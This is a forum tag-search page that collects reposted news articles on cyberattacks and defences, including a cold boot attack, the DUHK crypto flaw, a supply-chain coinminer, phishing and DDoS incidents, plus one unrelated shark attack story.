Jump to content

Search the Community

Showing results for tags 'attack'.

More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


  • Site Related
    • News & Updates
    • Site / Forum Feedback
    • Member Introduction
  • News
    • General News
    • FileSharing News
    • Mobile News
    • Software News
    • Security & Privacy News
    • Technology News
  • Downloads
    • nsane.down
  • General Discussions & Support
    • Filesharing Chat
    • Security & Privacy Center
    • Software Chat
    • Mobile Mania
    • Technology Talk
    • Entertainment Exchange
    • Guides & Tutorials
  • Off-Topic Chat
    • The Chat Bar
    • Jokes & Funny Stuff
    • Polling Station

Find results in...

Find results that contain...

Date Created

  • Start


Last Updated

  • Start


Filter by number of...

Found 16 results

  1. Why block them when you can fool them? New tool sets traps for hackers The method, called DEEP-Dig (DEcEPtion DIGging), ushers intruders into a decoy site so the computer can learn from hackers’ tactics. Instead of blocking hackers, the researchers have created a new cybersecurity defence approach, which involves setting traps for hackers. The method, called DEEP-Dig (DEcEPtion DIGging), ushers intruders into a decoy site so the computer can learn from hackers’ tactics. The information is then used to train the computer to recognise and stop future attacks.(Pixabay) Instead of blocking hackers, the researchers have created a new cybersecurity defence approach, which involves setting traps for hackers. The method, called DEEP-Dig (DEcEPtion DIGging), ushers intruders into a decoy site so the computer can learn from hackers’ tactics. The information is then used to train the computer to recognise and stop future attacks. DEEP-Dig advances a rapidly growing cybersecurity field known as deception technology, which involves setting traps for hackers. “There are criminals trying to attack our networks all the time, and normally we view that as a negative thing, instead of blocking them, maybe what we could be doing is viewing these attackers as a source of free labour,” said study researcher Kevin Hamlen from University of Texas in Dallas, US. “They’re providing us data about what malicious attacks look like. It’s a free source of highly prised data,” Hamlen added. The approach aims to solve a major challenge to using artificial intelligence (AI) for cybersecurity: a shortage of data needed to train computers to detect intruders. The lack of data is due to privacy concerns. Better data will mean better ability to detect attacks, the researchers said. “We’re using the data from hackers to train the machine to identify an attack, we’re using deception to get better data,” said study researcher Gbadebo Ayoade. Hackers typically begin with their simplest tricks and then use increasingly sophisticated tactics, the researchers said. But most cyberdefense programmes try to disrupt intruders before anyone can monitor the intruders’ techniques. DEEP-Dig will give researchers a window into hackers’ methods as they enter a decoy site stocked with disinformation The decoy site looks legitimate to intruders and attackers will feel they’re successful, said study researcher Latifur Khan. As hackers’ tactics change, DEEP-Dig could help cybersecurity defence systems keep up with their new tricks. According to the researchers, while DEEP-Dig aims to outsmart hackers, it might be possible that hackers could have the last laugh if they realise they have entered a decoy site and try to deceive the programme. “So far, we’ve found this doesn’t work. When an attacker tries to play along, the defence system just learns how hackers try to hide their tracks, it’s an all-win situation -- for us, that is,” Hamlen said. The study was presented at the annual Computer Security Applications Conference in December in Puerto Rico. Source
  2. Microsoft said it got a court order to seize 50 websites used by a hacker group with ties to North Korea that targeted government employees, universities, human rights organizations and nuclear proliferation groups in the U.S., Japan and South Korea. The group, known as Thallium, uses the network of websites, domains and connected computers to send out “spear phising” emails. Hackers gather as much information on targets as they can to personalize messages and make them appear legitimate. When the target clicks on a link in the email, hackers are then able to “compromise their online accounts, infect their computers, compromise the security of their networks and steal sensitive information,” Microsoft wrote in a blog post. Microsoft showed an example of one of Thallium’s spear phishing messages. It looks very much like a standard notification that comes with signing into a Microsoft account in a new location. One big difference, Microsoft says, is the group combined the letters “r” and “n” in the domain name to look like the first letter “m” in “microsoft.com.” Microsoft, through its Digital Crimes Unit and Threat Intelligence Center, has positioned itself as an important line of defense against so-called “nation state” hacking organizations. Microsoft has in recent years taken on hacking groups with ties to China, Iran and Russia. The tech giant uses the information it gathers from tracking these hackers to beef up its security products. Microsoft recommended a number of actions organizations can take to better protect themselves, including enabling two-factor authentication on business and personal email accounts, training people to spot phising attempts and enabling security alerts about links and files from suspicious websites. Source: MSN
  3. Unauthorised users able to perform 'arbitrary code execution' A critical vulnerability found in Citrix Application Delivery Controller and Citrix Gateway (formerly known as Netscaler ADC and Netscaler Gateway) means businesses with apps published using these technologies may be exposing their internal network to unauthorised access. Citrix (NetScaler) ADC is a load balancer and monitoring tech, while Unified Gateway provides remote access to internal applications. This can include desktop applications as well as intranet or web applications. "Any application on any device from any location" is the marketing pitch. On 17 December, Citrix published an advisory stating that a vulnerability in these services "could allow an unauthenticated attacker to perform arbitrary code execution." According to Positive Technologies, the security company which discovered the flaw, no account details are required. Positive says the "first vulnerable version of the software was released in 2014", and estimates that "at least 80,000 companies in 158 countries are potentially at risk." Since the whole idea of this technology is to enable remote access to internal applications, arbitrary code execution could give the attacker access to the internal network, making it a particularly critical flaw. Citrix has published mitigation steps which block certain SSL VPN requests, suggesting that this area is where the flaw lies. This is a mitigation rather than a complete fix. An SSL VPN is a secure tunnel into a remote network which uses the SSL protocol. The affected versions of Citrix ADC and Unified Gateway include 10.5, 11.1, 12.0, 12.1 and 13.0. The problem has been assigned the ID CVE-2019-19781 and details will be available at this link when published. Citrix said it is "notifying customers and channel partners about this potential security issue." Administrators are advised to apply the mitigation immediately. A full software fix will be made available in due course. Source
  4. A surfer who refers to himself as "shark bait" has been hospitalized after a shark attack during an early morning surf on the NSW mid-north coast. The man received five deep lacerations to one of his lower legs when he was bitten by a shark at Nambucca Heads after 7am on Sunday, a NSW Ambulance spokesman said. Joel Mason, 36, managed to swim to a nearby break wall, where a passer-by saw him and contacted emergency services. He was treated at the scene before being flown to John Hunter Hospital in Newcastle, where he's in a stable condition. Mr Mason's father, Rob, told Nine News his son has loved surfing since he was young and it was "very disturbing" when he found out about the incident. "He's surfed since he was 5 or 6 years old," Mr Mason said. "He loves to surf early and he loves to surf by himself which is sort of a bit risky. "He says he's shark bait but he's prepared to take the risk and he does." NSW Ambulance spokesman Steve Fraser said Mr Mason remained "extremely calm, extremely stoic" throughout the ordeal. Source
  5. Attackers gained access to some AdGuard accounts but company can't tell how many. AdGuard, a popular ad blocker for Android, iOS, Windows, and Mac, has reset all user passwords, the company's CTO Andrey Meshkov announced today. The company took this decision after suffering a brute-force attack during which an unknown attacker tried to log into user accounts by guessing their passwords. Meshkov said the attacker used emails and passwords that were previously leaked into the public domain after breaches at other companies. This type of attack --using leaked usernames and passwords to hack into accounts at other services-- is known as credential stuffing. The AdGuard CTO said attackers were successful in their assault and gained access to some AdGuard accounts, used for storing ad blocker settings. "We don't know what accounts exactly were accessed by the attackers," Meshkov said. "All passwords stored in AdGuard database are encrypted so we cannot check whether any of them is present in the known leaked database. That's why we decided to reset passwords of all users." The company says it implemented the Have I Been Pwned API into their existing infrastructure so that when users will configure a new password, the AdGuard system will warn them if they're using passwords leaked at other services. Meshkov said AdGuard now also uses stricter rules for choosing passwords, and they also intend to support two-factor authentication in the future. The AdGuard exec also revealed that the company found out about the attack after its rate-limiting systems detected the numerous failed login attempts during the password guessing phase of the attack. Most of the attacks were stopped, but some were successful, which usually tends to happen when attackers get lucky and guess the proper combination during the first login attempts. It is unclear what the attackers were attempting to do with such low-value accounts. Source
  6. If you want to secure the data on your computer, one of the most important steps you can take is encrypting its hard drive. That way, if your laptop gets lost or stolen—or someone can get to it when you're not around—everything remains protected and inaccessible. But researchers at the security firm F-Secure have uncovered an attack that uses a decade-old technique, which defenders thought they had stymied, to expose those encryption keys, allowing a hacker to decrypt your data. Worst of all, it works on almost any computer. To get the keys, the attack uses a well-known approach called a "cold boot," in which a hacker shuts down a computer improperly—say, by pulling the plug on it—restarts it, and then uses a tool like malicious code on a USB drive to quickly grab data that was stored in the computer's memory before the power outage. Operating systems and chipmakers added mitigations against cold boot attacks 10 years ago, but the F-Secure researchers found a way to bring them back from the dead. In Recent Memory Cold boot mitigations in modern computers make the attack a bit more involved than it was 10 years ago, but a reliable way to decrypt lost or stolen computers would be extremely valuable for a motivated attacker—or one with a lot of curiosity and free time. "If you get a few moments alone with the machine, the attack is a very reliable way to extract secrets from the memory," says Olle Segerdahl, principal security consultant at F-Secure. "We tested it on a number of different makes and models and found that the attack is effective and reliable. It's a bit invasive because it involves unscrewing the case and connecting some wires, but it's pretty quick and very doable for a knowledgable hacker. It's not super technically challenging." Segerdahl notes that the findings have particular implications for corporations and other institutions that manage a large number of computers, and could have their whole network compromised off of one lost or stolen laptop. To carry out the attack, the F-Secure researchers first sought a way to defeat the the industry-standard cold boot mitigation. The protection works by creating a simple check between an operating system and a computer's firmware, the fundamental code that coordinates hardware and software for things like initiating booting. The operating system sets a sort of flag or marker indicating that it has secret data stored in its memory, and when the computer boots up, its firmware checks for the flag. If the computer shuts down normally, the operating system wipes the data and the flag with it. But if the firmware detects the flag during the boot process, it takes over the responsibility of wiping the memory before anything else can happen. Looking at this arrangement, the researchers realized a problem. If they physically opened a computer and directly connected to the chip that runs the firmware and the flag, they could interact with it and clear the flag. This would make the computer think it shut down correctly and that the operating system wiped the memory, because the flag was gone, when actually potentially sensitive data was still there. So the researchers designed a relatively simple microcontroller and program that can connect to the chip the firmware is on and manipulate the flag. From there, an attacker could move ahead with a standard cold boot attack. Though any number of things could be stored in memory when a computer is idle, Segerdahl notes that an attacker can be sure the device's decryption keys will be among them if she is staring down a computer's login screen, which is waiting to check any inputs against the correct ones. Cold Case Because of the threat posed by this type of attack, Segerdahl says that institutions should keep careful track of all their devices so they can take action if one is reported lost or stolen. No matter how big an organization is, IT managers need to be able to revoke VPN credentials, Wi-Fi certificates, and other authenticators that let devices access the full network to minimize the fallout if a missing device is compromised. Another potential protection involves setting computers to automatically shut down when idle rather than going to sleep and then using a disk encryption tool—like Microsoft's BitLocker—to require an extra PIN when a computer turns on, before the operating system actually boots. This way there's nothing in memory yet to steal. If you're worried about leaving your computer unsupervised, tools that monitor for physical interactions with a device—like the Haven mobile app and Do Not Disturb Mac application—can help notify you about unwanted physical access to a device. Intrusions like the cold boot technique are often called "evil maid" attacks. The researchers notified Microsoft, Apple, and Intel about their findings. Microsoft has released updated guidance on using BitLocker to manage the problem. “This technique requires physical access. To protect sensitive info, at a minimum, we recommend using a device with a discreet Trusted Platform Module (TPM), disabling sleep/hibernation and configuring bitlocker with a Personal Identification Number,” Jeff Jones, a senior director at Microsoft said. Segerdahl says, though, that he doesn't see a quick way to fix the larger issue. Operating system tweaks and firmware updates could make the flag-check process more resilient, but since attackers are already accessing and manipulating the firmware as part of the attack, they could simply downgrade updated firmware back to a vulnerable version. As a result, Segerdahl says, long term mitigations require physical design changes that make it harder for an attacker to manipulate the flag check. Apple has already created one such solution through its T2 chip in new iMacs. The scheme separates certain crucial processes on a dedicated, secure chip away from the main processors that run general firmware and the operating system. Segerdahl says that though the renewed cold boot attack works on most Macs, the T2 chip does successfully defeat it. An Apple spokesperson also suggested that users could set a firmware password to prevent unauthorized access, and that the company is exploring how to protect Macs that don't have a T2. Intel declined to comment on the record. "This is only fixable through hardware updates," says Kenn White, director of the Open Crypto Audit Project, who did not participate in the research. "Physical access is a constant cat and mouse game. The good news for most people is that 99.9 percent of thieves would just sell a device to someone who would reinstall the OS and delete your data." For institutions with valuable data or individuals carrying sensitive information, though, the risk will continue to exist on most computers for years to come. Source
  7. Microsoft said today that hackers compromised a font package installed by a PDF editor app and used it to deploy a cryptocurrency miner on users' computers. The OS maker discovered the incident after its staff received alerts via the Windows Defender ATP, the commercial version of the Windows Defender antivirus. Microsoft employees say they investigated the alerts and determined that hackers breached the cloud server infrastructure of a software company providing font packages as MSI files. These MSI files were offered to other software companies. One of these downstream companies was using these font packages for its PDF editor app, which would download the MSI files from the original company's cloud servers during the editor's installation routine. Hackers created a copy of the company's cloud servers "Attackers recreated the [first company's] infrastructure on a replica server that the attackers owned and controlled. They copied and hosted all MSI files, including font packages, all clean and digitally signed, in the replica server," Microsoft's security researchers said. "The attackers decompiled and modified one MSI file, an Asian fonts pack, to add the malicious payload with the coin mining code," they added. "Using an unspecified weakness (which does not appear to be MITM or DNS hijack), the attackers were able to influence the download parameters used by the [PDF editor] app. The parameters included a new download link that pointed to the attacker server," Microsoft said. Users who downloaded and ran the PDF editor app would unknowingly install the font packages, including the malicious one, from the hackers' cloned server. Supply chain attack within a supply chain Because the PDF editor app was installed under SYSTEM privileges, the malicious coinminer code hidden inside would receive full access to a user's system. The malicious miner would create its own process named xbox-service.exe under which it would mine for cryptocurrencies using victims' computers. Microsoft said Windows Defender ATP detected mining-specific behavior from this process. Investigators then tracked down the origin of this process to the PDF editor app installer and the MSI font packages. Security researchers said it was easy to identify which MSI font package was the malicious one because all other MSI files were signed by the original software company, except one file, which lost its authenticity when crooks injected the coinminer code inside it. This malicious miner also stood out to investigators because it also tried to modify the Windows hosts file in a poor attempt at sinkholing update operations for various security apps. Tinkering with the Windows hosts file is a big no-no, and most antivirus software will mark this operation as suspicious or malicious. Microsoft did not reveal the names of the two software companies involved in this incident. The OS maker says the compromise lasted between January and March 2018, and affected only a small number of users, suggesting the hacked companies aren't big names on the PDF software market. Source
  8. Many people tell me that their websites are safe. Why? Because "Who will bother to attack my site?" Or "Our business is too small for anyone to hack." Oh please! There's this popular fallacy that attackers on the internet always target particular sites. They don't. Yes, some do. I'm looking at you Equifax. But most attacks are made by bots, which don't know a thing about you, your business, or your website. Bots don't care who you are or what you do. If you're on the web, you're a target. According to the web security company Imperva, half of all website visitors are bots. Of those, approximately 29 percent of all your "visitors" are there to attack your site. Contrary to those of you who think your website is too small to be noticed, Imperva found the less traffic you get, the more likely you are to be attacked. "In the least trafficked domains -- those frequented by ten human visitors a day or less -- bad bots accounted for 47.7 percent of visits while total bot traffic amounted to 93.3 percent." Indeed, "Bad bots will try to hack [your site] regardless of how popular it is with the human folk. They will even keep visiting a domain in absence of all human traffic." Does that sound crazy? For people, yes, but bots aren't people. They're constantly scanning the web and attacking sites over and over again. Don't believe it? Let's look at the evidence. Honeynet, an international non-profit security research organization, with help from students at Holberton School, recently set up a honeypot to track security attacks on a cloud-based webserver. This ran on a barebones Amazon Web Services (AWS) instance. It was running no services that would be useful to anybody else. It did not even have a domain name. Shortly after starting the server, they started capturing network packets for a 24-hour period with the best network traffic analysis tool available today, Wireshark. They then analyzed the packet capture file with Wireshark; Computer Incident Response Center's (CIRCL) Border Gateway Protocol (BGP) ranking API; and p0f, a passive TCP/IP traffic fingerprinting program. In a day, a mere 24 hours, this unnamed, almost invisible web server was attacked more than a quarter of a million times. Think about that for a minute. Now, start locking down your website. Of those attacks, the vast majority of them, 255,796 connection attempts, were made via Secure Shell (SSH). The researchers then opened a honeypot, a server designed to look like a real website, to collect attack data. To keep the project workable, they chose to open up the web's Hypertext Transfer Protocol (HTTP), SSH, and the Telecommunications Network (Telnet) protocol for attacks. Telnet, some of you may ask? Who uses Telnet anymore? We do, thanks to badly designed Internet of Things (IoT) devices. Some IoT gadgets use Telnet for configuration and management. That's asking for your devices to be hacked. Telnet had never had any security to speak of. The majority of the HTTP attacks were made to PHPMyadmin, a popular MySQL and MariaDB remote management system. Many web content management systems, not to mention WordPress, rely on these these databases. Vulnerable WordPress plugins were also frequently attacked. Mind you, this was on a system that even in honeypot mode hadn't emitted a single packet towards the outside world. Many attempted attacks relied on old malware, known configuration problems, common username/password combinations, and previous well-known attacks. For example, attackers tried to crack the webserver with Shellshock, although patched in 2014, and the Apache Struts vulnerability, which was fixed in March 2017. You can't blame the people who write the bots for using obsolete attack vectors. As well-known security expert SwiftOnSecurity tweeted: "Pretty much 99.99 percent of computer security incidents are oversights of solved problems." As for SSH, most of the attacks were brute-force assaults running through lists of commonly used usernames and passwords over the entire range, 1-65535, of TCP ports. Is it any surprise that Imperva has found that one in three website visitors is an attack bot? Imperva and Holberton also found that "The attack patterns we recorded for HTTP and SSH relied on generic exploit attempts that seemed to scan a range of IP addresses for well-known vulnerabilities. Telnet, on the other hand, relied on even simpler intrusion methods, by bruteforcing with default username and password combinations. Sometimes, these spray-and-pray attacks immediately attempted to download antiquated scripts, or more contemporary trojans, but none of the recorded attempts were covert enough to evade detection or overcome simple protective measures." These attacks aren't sophisticated. They're being driven by bot and botnets to attack any and all sites they find. These automated hackers are hunting for weak, unprotected websites. The moral of this story is if you have any web presence -- and I mean any -- you must secure your site with basic security rules. That starts with using firewalls to block all ports to your site except for the ones you use. You must also disable any internet-facing services unless you're using them. Finally, you must keep your software patched and up to date. Your site will still get hammered on a daily basis, but you'll be safe from the vast majority of automated hackers. source
  9. Man Threatened Company with Cyber Attack to Fire Employee and Hire Him Instead A North Carolina judge sentenced a Washington man this week to 37 months in prison for threatening a company with attacks unless they fire one of their employees and hire him instead. According to court documents obtained by Bleeping Computer, on April 18, 2016, Todd Michael Gori sent an email to TSI Healthcare, a healthcare software vendor based in Chapel Hill, North Carolina. Gori, a 28-year-old resident of Wenatchee, Washington, threatened the company with cyber attacks by him and unnamed friends if the company did not fire one of its employees and hire him instead. Gori's email extortion "I am giving you, TSI healthcare two choices," Gori wrote in the email. "You either lay-off [identity redacted] and replace her with me, an operator 100x better that she is oppressing. Or I will take out your entire company along with my comrades via a cyber attack." According to the same letter, Gori was fueled by a personal vendetta after the same employee denied his job application several times in the past. "Again you have two choices. Get ride of her and hire me. Or slowly be chipped away at until you are gone. She is a horrible operator that can only manage 2 screens with an over inflated travel budget. I fly at least 10x as many places as this loon on 1/5th of the budget," the email reads. "I have petitioned for a job with you guys with her as a reference as I am a felon with computer skills and need assistance getting work as technically I have 'no work history'. She declines everytime and burries me even further." Gori then bragged about having pen-tested TSI's website and having found weak security measures. "'Im giving you guys 72 hours to respond until the attack goes full scale. There is nothing that can be done to stop the attacks. I have ran multiple penetration tests on your entire network and your company fails miserably. "Again let me be clear. The only way I will work with TSI and stop the attack is to fire [identifying information redacted] and hire me and ensure I am compensated enough ..." Gori allegedly threatened to shoot TSI employees Gori did not detail the type of cyber-attack he was preparing. TSI turned to the FBI after receiving the email threat. Authorities tracked down and arrested Gori in August 2017. According to the original indictment, the FBI charged Gori on more severe charges after they found out he also threatened to buy a gun and shoot TSI employees. Gori signed a plea agreement soon after his arrest, and prosecutors dropped this latter charge. Besides the 37-month prison stint, Gori also received three years of supervised release. https://www.bleepingcomputer.com/news/security/man-threatened-company-with-cyber-attack-to-fire-employee-and-hire-him-instead/
  10. After last week we had the KRACK and ROCA cryptographic attacks, this week has gotten off to a similarly "great" start with the publication of a new crypto attack known as DUHK (Don't Use Hard-coded Keys). The issue at the heart of the DUHK attack is a combination of two main factors. The first is the usage of the ANSI X9.31 Random Number Generator (RNG). This is an algorithm that takes random data and generates encryption keys used to secure VPN connections, browsing sessions, and other encrypted traffic/data. The second factor needed for a DUHK attack is when hardware vendors use a hardcoded "seed key" for the ANSI X9.31 RNG algorithm. Normally, vendors should generate a random seed key at device startup or before launching the ANSI X9.31 algorithm. This means that when you have hardware/software products that combine ANSI X9.31 and deploy a hardcoded seed key, attackers can decrypt encrypted communications carried out through that device. This includes communications passing over VPN connections or encrypted web sessions that carry out login credentials, payment information, Intranet information, private enterprise data, and more. Old Fortinet FortiGate devices vulnerable to DUHK attacks The DUHK attack was discovered by two researchers from the University of Pennsylvania and one researcher from Johns Hopkins University. In a research paper they published today — entitled "Practical state recovery attacks against legacy RNG implementations" — researchers reveal they were able to recover encrypted traffic from Fortinet FortiGate devices used by companies across the world as firewalls or to create private VPN networks. The research team says they reversed engineered FortiGate firmware images and found the hard-coded seed key. They then observed traffic coming from the affected device and using the seed key, they brute-forced encrypted data to guess the rest of the encryption parameters. This, in turn, allowed them to determine the main encryption key. Fortinet FortiGate devices using FortiOS 4.3.0 to FortiOS 4.3.18 are vulnerable to DUHK attacks (CVE-2016-8492). FortiOS 5.x is not affected, while Fortinet removed the hard-coded seed key in FortiOS 4.3.19 after researchers contacted the company. At the time of their research, experts said they found over 23,000 older Fortinet 4.x devices exposed online. This number could be greater, as some devices might be located on firewalled networks, but still vulnerable to attacks. DUHK attack takes up to 4 mins/connection The attack is not trivial, but researchers say it's practical as an attacker using a modern computer can recover the encryption key in around four minutes per connection. There is no user interaction needed to carry out a DUHK attack, as all the threat actor needs is a position to observe traffic coming from a vulnerable device. Because this is a passive network attack, victims cannot detect when someone uses a DUHK attack against them. The research team also warns that other hardware and software products may also be affected by DUHK attacks. Researchers also published a list of products where they found hard-coded ANSI X9.31 seed keys. ANSI X9.31 was a very popular RNG algorithm This is because ANSI X9.31 is very widespread. Up until January 2016, the algorithm was on the list of US government (FIPS) approved RNG algorithms. ANSI X9.31 remained on the list until 2016, even if US NIST deprecated the algorithm in 2011, and scientists warned that the algorithm could be broken if the seed key ever leaked way back in 1998. "If your product was certified after January 2016, then it is not vulnerable," the research team says. "If it was certified for the X9.31 RNG at any time, FIPS certification does not prevent this implementation vulnerability." This is because vendors could have FIPS-compliant ANSI X9.31 implementations, but if they left a hard-coded seed key in the firmware, they automatically backdoored their own device's encryption. More details about the DUHK attack are available on this dedicated homepage, and in a blog post by Matthew Green, one of the researchers. https://www.bleepingcomputer.com/news/security/duhk-crypto-attack-recovers-encryption-keys-exposes-vpn-connections-more/ This doesnt look good.
  11. UPDATE – UltraDNS said it has mitigated a distributed denial of service (DDoS) attack for most of its customers after the service was held down for most of the day. “Currently, only customers utilizing a segment of UltraDNS Name Server addresses are experiencing resolution latency due to intermittent network saturation in the Western US,” said Neustar director of product management, security solutions, Jim Fink in an email to Threatpost. “We continue to aggressively refine mitigations for these customers and hope to have the issue resolved shortly. We have been and will continue to provide regular updates to our UltraDNS customers via our usual customer notification process.” UltraDNS is a Neustar company. The SANS Institute’s Internet Storm Center said this afternoon that it received multiple reports of outages and DNS resolution issues, reportedly because of a 100 Gbps DDoS attack against one of UltraDNS’ customers that resulted in latency issues for others. “One reporting party did indicate that they learned that the management of UltraDNS had said that one of their customers was being attacked and that they black-holed that customer to get back on trend,” wrote ISC handler Russ McRee. “Resolver nodes around the world are resetting.” DDoS attacks the size of this one are quickly becoming the norm. A report from Arbor Networks this week said it has already tracked more than 70 DDoS attacks of 100 Gbps or more of bad traffic, topping out at 325 Gbps. The largest attacks on public record were recorded by traffic optimization and security provider CloudFlare Most volumetric attacks rely on some kind of amplification such as DNS reflection or Network Time Protocol amplification attacks where the requesting IP address is spoofed as the target’s and massive amounts of traffic is returned at relatively little cost to the attacker. With DNS amplification attacks, attackers take advantage of any number of the 28 million open DNS resolvers on the Internet to launch large-scale DDoS attacks. The motivations are varied. Ideological hackers use them to take down services in protest, while profit-motivated criminals can use DDoS as a cover for intellectual property theft and financial fraud. Beginning with the DDoS attacks against large U.S. banks early last year, the spike in these attacks merited a mention in the recent Verizon Data Breach Investigations Report. “We’re seeing a growing trend of combining DDoS with APT campaigns,” said Arbor Networks’ Gary Sockrider said. “Go back a few years, and DDOs was thought of more as a takedown mechanism, not for data exfiltration. Now we’re seeing it more frequently combined with APT, prolonged campaigns where an attacker is on your network and now need to get the data out, they’ll initiate a DDoS attack. It’s the equivalent of a natural disaster and while you’re dealing with it, that’s when they’ll exfiltrate data.” Source
  12. Germany's aeronautics and space research center has for months been the target of a suspected cyber attack by a foreign intelligence service, a German news weekly reported Sunday. Der Spiegel said that several computers used by scientists and systems administrators at the Cologne-based DLR center had been infiltrated by spy programs. "The government classes the attack as extremely serious because it, among other things, is aimed at armament and rocket technologies," Spiegel said. In some computers IT experts found traces of spy programs that were set up to destroy themselves on discovery, while others only activated themselves after months of lying in wait. Spiegel said the attacks were "coordinated and systematic" and all the center's operation systems were affected. IT forensic experts probing who could be behind the assault have turned up clues that seem to point to China, but Spiegel quoted an unidentified "insider" as saying they could also simply be "camouflage". Government sources said the case was being investigated but declined to confirm any details. The German aeronautics and space research center is active in the fields of aeronautics, space, energy, transport and security and is involved in international cooperative ventures, according to its website. Source
  13. Threat researchers from Cisco have shared details on a new and rapidly spreading attack targeting web servers running on systems powered by outdated versions of Linux. According to Cisco, upward of 400 different hosts were affected each day on March 17 and 18, with attackers successfully compromising more than 2,700 URLs at the time of publishing. The attackers are compromising legitimate websites, Cisco said, with most of the affected web servers running on the Linux 2.6 kernel—an outdated version that was first released in 2003. The location of compromised servers have been found throughout the world, but have a particularly high concentration in Germany and the United States. “It is possible that attackers have identified a vulnerability on the platform and been able to take advantage of the fact that these are older systems that may not be continuously patched by administrators,” Cisco’s Martin Lee wrote in a blog post late Thursday. In order to execute the attack, cybercriminals compromise an existing website, insert a line of JavaScript to multiple .js files hosted on the site, causing visitors to load and execute a new JavaScript file served from compromised third-party host. “We observed the second stage sites serving what appears to be pay per view fraud pages, where the visitor’s browser loads multiple advertisements to generate revenue for the attacker,” Lee said. “However, there is anecdotal evidence that visitors have been infected with Trojan malware as part of this final step.” Many of the affected hosts have been identified as compromised and cleaned, Cisco said. Lee explained that some security products may detect the JavaScript redirect as being similar to that previously used in the Blackhole exploit kit, but Cisco has no evidence suggesting that the attacks are related to Blackhole rather than an example of code reuse. “This large scale compromise of an aging operating system, highlights the risks posed by leaving such systems in operation,” Lee said. "Systems that are unmaintained or unsupported are no longer patched with security updates," he continued. "When attackers discover a vulnerability in the system, they can exploit it at their whim without fear of it being remedied. In April 2014, Windows XP will become unsupported. Organizations urgently need to review their use of unsupported systems in operation. Such systems need to be upgraded where possible, or regularly monitored to detect compromise. Just yesterday, researchers from Imperva issued a threat advisory about an old PHP vulnerability that was patched in 2012 but actively being exploited in attacks. While this particular PHP flaw was discovered in March 2012 and patched in May, a public exploit began making the rounds in October 2013, Imperva said in its advisory. Imperva's honeypots detected more than 30,000 campaigns using some form of the exploit within three weeks of its publication. The fact that the exploit became publicly available more than a year later suggests criminals were still enjoying some degree of success targeting this vulnerability, Barry Shteiman, director of security strategy at Imperva, told SecurityWeek. “Large numbers of vulnerable unpatched systems on the Internet are tempting targets for attackers,” Cisco’s Lee said. “Such systems can be used as disposable one-shot platforms for launching attacks. This makes it all the more important that aging systems are properly maintained and protected.” Cisco has provided a list of compromised URLs here and here, which can be used for blacklisting and URL filtering in order to prevent users from visiting those pages. Earlier this week, ESET warned of a widespread attack campaign that has infected more than 25,000 Linux and UNIX servers around the world. According to ESET, the servers are being hijacked by a backdoor Trojan as part of a campaign the researchers are calling 'Operation Windigo.' Once infected, victimized systems are leveraged to steal credentials, redirected web traffic to malicious sites and send as much as 35 million spam messages a day. Source
  14. By Manish Singh on February 11, 2014 - 07:18PM Internet, much like the real world, has bad people too. And while the digital security of the entire planet seems to be a train-wreck, things are even worse in India. According to Microsoft’s third annual Computing Safety Index (MCSI)​ report, 20% Indians are the victims of online phishing attacks. The victims in this case lose around Rs. 7500 ($120 USD) on average. “About 12 per cent Indian respondents said they suffered identity theft at an average cost them Rs 7,500," the MSCI states. Whereas the annual worldwide impact of phishing and identity theft is around $5 billion, while fixing peoples’ online reputation could go as high as $6 million. “The annual worldwide impact of phishing and other various forms of identity theft could be as high as $5 billion, with the cost of repairing the damage to peoples' online reputation being higher yet at nearly $6 billion or an estimated average of $632 (Rs 39,000) per loss," the MSCI mentioned. The survey which was released today on Safer Internet Day, used the data gathered from testing around 10,500 users from across 20 nations. According to the report, only 34% of them care to prevent strangers from seeing their updates on social media. Whereas, 38% of people actually tweak some settings to set control over who sees what. Furthermore, only 35% of the users employed a PIN protection to keep their devices secure. "Internet users can prevent intrusions and thefts by using a unique four-digit PIN for mobile devices and strong passwords for online accounts," Microsoft India National Technology Officer Prakash Kumar said. It is high time we became aware of online attacks and started using simple preventive measures which can save us a whole lot of trouble. “The Internet touches our lives every day, whether we are communicating with loved ones, for work, shopping, and paying bills. But how cautious are we about monitoring our online presence, and taking note of our own vulnerabilities? There are many things you can do to stay safer online," Kumar added. http://www.winbeta.org/news/phishing-attacks-20-percent-indians-are-victims-says-microsoft
  15. By Adrienne Hall, General Manager, Trustworthy Computing Group 24 Jan 2014 9:27 AM Recently, a select number of Microsoft employees’ social media and email accounts were subjected to targeted phishing attacks. This type of attack is not uncommon, and many companies grapple with phishing attempts from cybercriminals (visit www.microsoft.com/sir). While our investigation continues, we have learned that there was unauthorized access to certain employee email accounts, and information contained in those accounts could be disclosed. It appears that documents associated with law enforcement inquiries were stolen. If we find that customer information related to those requests has been compromised, we will take appropriate action. Out of regard for the privacy of our employees and customers – as well as the sensitivity of law enforcement inquiries – we will not comment on the validity of any stolen emails or documents. In terms of the cyberattack, we continue to further strengthen our security. This includes ongoing employee education and guidance activities, additional reviews of technologies in place to manage social media properties, and process improvements based on the findings of our internal investigation. http://blogs.technet.com/b/trustworthycomputing/archive/2014/01/24/post.aspx
  16. Adam Clark Estes January 13, 2014 4:00pm As you probably suspected, the NSA’s massive phone record collection “has had no discernible impact on preventing acts of terrorism,” according to a new study. In fact—and perhaps more interestingly—the agency’s real problem isn’t a lack of information. It’s an excess of secrecy. In the study, the New America Foundation reviewed 225 terrorism cases and found that traditional investigation and law enforcement methods actually did the most to prevent attacks. About a third of the leads in terrorism cases came from tips or an informant, while old school surveillance warrants were used in 48 cases. All things told, bulk telephony metadata collection provided evidence in only one case, a case that didn’t even present the threat of an attack against the United States. The results of the New America Foundations study are notable but not terribly surprising. After all, President Obama’s own advisory board said a couple weeks ago that the NSA’s program “was not essential to preventing attacks” and that the real useful evidence “could readily have been obtained in a timely manner using conventional [court] orders.” They also agree that the NSA’s secrecy is doing more harm that good. The timing of the study couldn’t be better. President Obama will announce widespread reforms to the NSA and other government surveillance practices on January 17 and is expected to follow many of the advisory board’s recommendations. Afterwards, maybe the NSA can actually do something other than spy on unwitting Americans. Maybe they can do something useful! [New America Foundation via Washington http://www.gizmodo.co.uk/2014/01/nsa-phone-spying-is-useless-in-preventing-terrorist-attacks-study-says Edit: The above "study" is an interactive figure shows all variables in details Original Study: http://www.newamerica.net/publications/policy/do_nsas_bulk_surveillance_programs_stop_terrorists Full Study Report PDF http://www.newamerica.net/sites/newamerica.net/files/policydocs/Bergen_NAF_NSA%20Surveillance_1.pdf
  • Create New...